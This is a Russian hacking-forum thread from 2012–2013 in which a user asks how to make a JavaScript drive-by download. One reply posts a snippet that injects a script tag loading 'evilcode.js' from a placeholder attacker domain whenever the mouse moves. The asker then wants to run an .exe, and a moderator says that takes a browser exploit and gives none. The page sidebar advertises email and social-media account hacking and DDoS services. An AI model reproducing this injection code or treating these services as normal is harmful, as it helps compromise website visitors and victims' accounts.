Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Kак сделать drive-by загрузку на js? Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Программы RSS подписка на сообщения с форума Subscribe Модераторы: RenGO, B3JIoMep, BRUNOTTI, Virous, xssmailcom
Взлом программ. Кряки и серийники качаем тут

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 3146
Kак сделать drive-by загрузку на js?
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
Swarex


Novice
# | Сообщение добавлено 23.12.2012 21:54:19
Kак сделать drive-by загрузку через javascript?
Сказать спасибо Ответить Цитировать

.pascal




Silver Member
# | Сообщение добавлено 25.12.2012 16:07:40
Это лучше делать через jQuery. На многих сайтах она уже присутствует. А если нет то её можно брать с гугла или с самого сайта jquery.com
Ставишь на <body> событие mousemove и в него прописываешь свою функцию.
 
Можно обойтись без jquery но атрибут mousemove элемента body может быть уже занят другой функцией, особенно если на сайт навешаны скрипты с левых сайтов вроде тепловой карты кликов. Тогда лучше юзать addEventListener, но оно работает не во всех браузерах. Поэтому лучший вариант это jquery.
 
Простенький пример (может не работать на некоторых сайтах):
 
Text

<script type='text/javascript'>
 
function driveByLoad()
 {
 if (window.already_loaded) return;
 window.already_loaded = true;
 var div = document.createElement('div');
 div.innerHTML = "<script src='http://hacksite.ru/evilcode.js'></scr" + "ipt>";
 document.body.appendChild(div);
 }
 
document.onmousemove = driveByLoad;
 
</script>
 

 
--
Silence is golden...
Сказать спасибо Ответить Цитировать

Swarex


Novice
# | Сообщение добавлено 27.12.2012 18:18:33
нет,надо, что бы он запускал не другой js, ф .exe файл
Сказать спасибо Ответить Цитировать

Virous



Moderator
Gold Member
# | Сообщение добавлено 27.12.2012 18:22:00
Запустить EXE невозможно ни одним штатным способом. Для этого на компьютере должен быть либо предустановленный программный пакет (по такому принципу работает node.js) либо же эксплуатирование какой-либо уязвимости. Ранее так попадали всякие WinLockerы итд. Сейчас вроде бы проблема стала редкой.
 
Так или иначе это не просто и вряд ли Вам предоставят такой код бесплатно.
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

Swarex


Novice
# | Сообщение добавлено 27.12.2012 22:00:15
запустить ехе возможно,сам недавно словил троян-маячок именно таким образом,не так уж это и редко.впрочем на полноценный рабочий код не претендую, но хотябы работавший со старыми брузерами и ли хоть в общих чертах как ето происходит
Сказать спасибо Ответить Цитировать

Virous



Moderator
Gold Member
# | Сообщение добавлено 27.12.2012 22:18:45
Swarex

сам недавно словил троян-маячок именно таким образом
Поделитесь кодом.
 
Добавлено 27.12.2012 22:25:17 (через 7 минут 32 секунды )
 
Virous

запустить ехе возможно
Так никто и не говорит, что невозможно. Только не на JS чистом, а с использованием уязвимости. Если бы было так просто запустить EXE, представьте, какой бы был беспредел в сети.
 
Добавлено 27.12.2012 22:30:57 (через 6 минут 40 секунд )
 
.pascal

Это лучше делать через jQuery.
А если пользователь не двигает мышью во время загрузки?
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

Swarex


Novice
# | Сообщение добавлено 04.01.2013 00:12:39
к сожалению не сохранил.
ну так и вопрос в том, что это за уязвимости и как это работает,хотя бы один примерчик,допустим со старым браузером?
Сказать спасибо Ответить Цитировать

Virous



Moderator
Gold Member
# | Сообщение добавлено 04.01.2013 01:09:10
Swarex

ну так и вопрос в том, что это за уязвимости и как это работает
Ответ на этот вопрос знают не многие, а те, кто знает, бесплатно точно не скажет.
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

Swarex


Novice
# | Сообщение добавлено 09.01.2013 22:03:22
Virous

Ответ на этот вопрос знают не многие, а те, кто знает, бесплатно точно не скажет.
даже о старых и заделанных уязвимостях?
Сказать спасибо Ответить Цитировать

Virous



Moderator
Gold Member
# | Сообщение добавлено 09.01.2013 22:13:47
О заделанных и старых знают всевозможные Bug треки (например тот, что здесь).
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Разное / Продам, отдам » Продам свежие, июнь 2019, базы 2ГИС(2gis), яндекс.карты
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом страниц: ВКонтакте, Одноклассники.
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}